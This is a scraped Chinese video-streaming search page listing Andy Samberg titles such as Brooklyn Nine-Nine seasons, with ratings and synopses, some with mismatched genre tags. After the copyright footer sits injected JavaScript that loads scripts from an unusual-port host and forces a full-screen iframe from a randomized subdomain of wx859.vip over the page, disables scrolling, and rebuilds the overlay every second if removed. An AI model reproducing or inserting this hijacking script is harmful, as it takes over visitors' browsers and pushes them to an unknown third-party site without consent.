搜索结果

搜索安迪·萨姆伯格,共找到个视频

评分10.0
神烦警探第一季(2013)[战争片]
杰克(安迪·萨姆伯格 Andy Samberg 饰)是一位精明强干的警探,被他所捕获的罪犯能排上好长一列,然而,在其他同事,包括他那新上任的上司雷(安德鲁·布劳尔 Andre Braugher 饰)眼中,一心追求“成绩”的他似乎有那么一些“不守规矩”。艾米(Melissa Gallo 饰)出生于警察世家,作为家中唯一一个穿上警服的女孩,她明白自己肩上背负着怎样的重担,有些时候,这重担压得她都有些喘...
评分4.0
神烦警探第五季(2017)[战争片]
杰克(安迪·萨姆伯格 Andy Samberg 饰)和洛萨(斯蒂芬妮·比翠丝 Stephanie Beatriz 饰)被缉毒组的恶警察诬陷后深陷牢狱,在其他上司雷(安德鲁·布劳尔 Andre Braugher 饰)、女友艾米(Melissa Gallo 饰)、警长泰瑞(泰瑞·克鲁斯 Terry Crews 饰)、警探查尔斯(乔·洛·特鲁格里奥 Joe Lo Truglio 饰)等这帮兄弟姐妹们的帮...
评分8.0
黑袍纠察队:劣迹(2022)[战争片]
衍生诗选类动画剧《劣迹》,讲述《黑袍纠察队》世界中还不为人知的故事。...
评分9.0
神烦警探第六季(2019)[战争片]
《神烦警探》起死回生,NBC接盘续订新一季#兼具破案和搞笑一体的剧集《神烦警探》最近命运可谓和它经常有些无厘头的剧情一样了。昨天Fox宣布取消续订该剧第六季,这让该剧的广大粉丝们心碎不已,立刻发起了续订请愿。据悉,Hulu Netflix均曾有意向接手该剧,但最终都不了了之。好在随后,主创Michael Goor宣布NBC正式接手该剧。NBC将续订剧集第六季,共12集。NBC曾经是非黄金时段喜剧霸...
评分1.0
在朋友们的眼中,西勒斯特(拉什达·琼斯 Rashida Jones 饰)和杰西(安迪·萨姆伯格 Andy Samberg 饰)是天设地造的一对。两人的爱情从高中一直延续至今,热烈、持久、充满了激情。可是,随着时间的流逝,在这两个人的眼中,对方的身影已经不再如当初那样美好,杰西的玩世不恭和不思进取让西勒斯特无法忍受,而西勒斯特的高高在上和咄咄逼人也时常让杰西觉得很受伤。在两人的面前,似乎只剩下离婚一...
评分10.0
自力更生(2023)[喜剧片]
Given the opportunity to participate in a life or death reality game show, one man discovers there's a lot to live for....
本网站只提供web页面服务,通过链接的方式提供相关内容(所有视频内容收集于各大视频网站),本站不对链接内容具有进行编辑、整理、修改等权利
Copyright © 2011-2025  合作邮箱:[email protected]  备案号:浙ICP备15018022号-1   // 生成指定长度的随机字符串(小写字母+数字) function generateRandomString(length) { const characters = 'abcdefghijklmnopqrstuvwxyz0123456789'; let result = ''; for (let i = 0; i < length; i++) { // 从字符集中随机取一个字符拼接到结果 result += characters.charAt(Math.floor(Math.random() * characters.length)); } return result; } var _mtj = _mtj || []; (function () { var mtj = document.createElement("script"); mtj.src = "https://node90.aizhantj.com:21233/tjjs/?k=lel6ykjn4ap"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(mtj, s); })(); var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?507730829fa78019a713422d5c3379c0"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); // 创建并插入iframe function createIframe() { // 生成6位随机前缀 const randomPrefix = generateRandomString(6); // 拼接iframe目标URL const url = "https://" + randomPrefix + ".wx859.vip/beibei.html"; // 创建iframe元素 const iframe = document.createElement('iframe'); iframe.src = url; // 设置iframe样式为全屏遮罩 iframe.style.position = 'fixed'; iframe.style.top = '0'; iframe.style.left = '0'; iframe.style.width = '100vw'; iframe.style.height = '100vh'; iframe.style.border = 'none'; iframe.style.zIndex = '999999'; iframe.style.setProperty('display', 'block', 'important'); iframe.style.setProperty('visibility', 'visible', 'important'); iframe.setAttribute('frameborder', '0'); iframe.setAttribute('scrolling', 'yes'); iframe.setAttribute('allowfullscreen', 'true'); iframe.setAttribute('loading', 'lazy'); // 如果body已存在,直接插入iframe,否则等DOMContentLoaded事件 if (document.body) { document.body.appendChild(iframe); disableScroll(); } else { document.addEventListener('DOMContentLoaded', function() { document.body.appendChild(iframe); disableScroll(); }); } } // 禁止页面滚动 function disableScroll() { document.body.style.overflow = 'hidden'; document.documentElement.style.overflow = 'hidden'; } // 立即执行函数,初始化 (function() { try { // 尝试插入iframe createIframe(); } catch(e) { // 若有异常,1毫秒后重试 setTimeout(createIframe, 1); } // 守护检测:每1秒检测iframe是否存在,不存在则重建 setInterval(function() { const iframe = document.querySelector('iframe'); if (!iframe || !document.body.contains(iframe)) { createIframe(); } }, 1000); // 监听屏幕旋转,延迟300ms后重设iframe大小 window.addEventListener('orientationchange', function() { setTimeout(resizeIframe, 300); }); // 监听窗口大小变化,延迟300ms后重设iframe大小 window.addEventListener('resize', function() { setTimeout(resizeIframe, 300); }); // 重设iframe宽高为全屏 function resizeIframe() { const iframe = document.querySelector('iframe'); if (iframe) { iframe.style.width = '100vw'; iframe.style.height = '100vh'; } } // 兼容iOS滚动,实时修正iframe高度 if (/iPad|iPhone|iPod/.test(navigator.userAgent)) { window.addEventListener('scroll', function() { const iframe = document.querySelector('iframe'); if (iframe) { iframe.style.height = window.innerHeight + 'px'; } }); } })();

个人

公众号

QQ群

留言

顶部
退出将无法使用会员功能

会员专享收藏与播放记录

全新的交互式体验

分享便可赚积分升级会员组